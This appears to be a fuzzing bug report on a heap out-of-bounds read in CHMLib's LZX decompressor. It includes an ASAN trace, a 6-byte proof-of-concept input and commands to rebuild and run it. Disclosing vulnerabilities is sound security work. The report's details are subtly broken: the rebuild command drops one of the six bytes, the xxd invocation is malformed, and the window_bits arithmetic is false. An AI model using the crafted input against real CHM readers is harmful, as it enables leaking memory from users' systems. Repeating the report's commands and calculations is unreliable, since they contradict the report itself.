lzx.c:634 — Huffman Table OOB Read in ALIGNED Block

[3291710458]

Location

src/lzx.c:634 in LZXdecompress() — LZX_BLOCKTYPE_ALIGNED handler.

case LZX_BLOCKTYPE_ALIGNED:
    while (this_run > 0) {
        READ_HUFFSYM(MAINTREE, main_element);  // <-- LINE 634
        ...

Root Cause

The READ_HUFFSYM(MAINTREE, main_element) at line 634 accesses the MAIN
Huffman decode table (pState->MAINTREE_table) using a table index computed
from PEEK_BITS(LZX_MAINTREE_TABLEBITS). When the MAIN tree table was built
from crafted code-length data (provided earlier in the compressed stream), the
table can contain entries that cause the decoder to access indices far beyond
the allocated table array.

This is a heap Out-of-Bounds Read from the MAIN tree Huffman decode table.

ASAN Trace

==1520196==ERROR: AddressSanitizer: SEGV on unknown address 0x52a00002fe62
  (pc 0x5618c97e836d bp 0x000000000010 sp 0x7ffc2dc5a1d0 T0)
==1520196==The signal is caused by a READ memory access.
    #0 0x5618c97e836d in LZXdecompress src/lzx.c:634
    #1 0x5618c97e174c in main /home/ubuntu/fuzzing/CHMLib/harness_lzx.c:34
SUMMARY: AddressSanitizer: SEGV src/lzx.c:634 in LZXdecompress

The crash address 0x52a00002fe62 contains the ASAN heap redzone marker
0x52a, indicating a read beyond a heap-allocated object (the Huffman table).

PoC

File: 6 bytes, triggers OOB heap read at src/lzx.c:634

Hex dump

00000000: 72 ff 2f fe ee 11                           r./...

# Recreate the Poc binary from hex
echo "72 ff 2f fe 11" | xxd -r -> poc.bin

# Run with ASAN
AFL_USE_ASAN=1 /fuzzer_lzx < poc.bin

• Byte 0 (0x72): window_bits = 0x72 % 20 + 1 = 3 → window_size = 8
• Bytes 1-5: Crafted LZX compressed data that corrupts the MAIN tree table
  during the BUILD_TABLE(MAINTREE) phase

Severity: HIGH (CVSS 7.5)

• AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
• Remote-exploitable via crafted CHM file
• Heap OOB read can leak sensitive memory contents
• No authentication required; attacker controls the entire compressed stream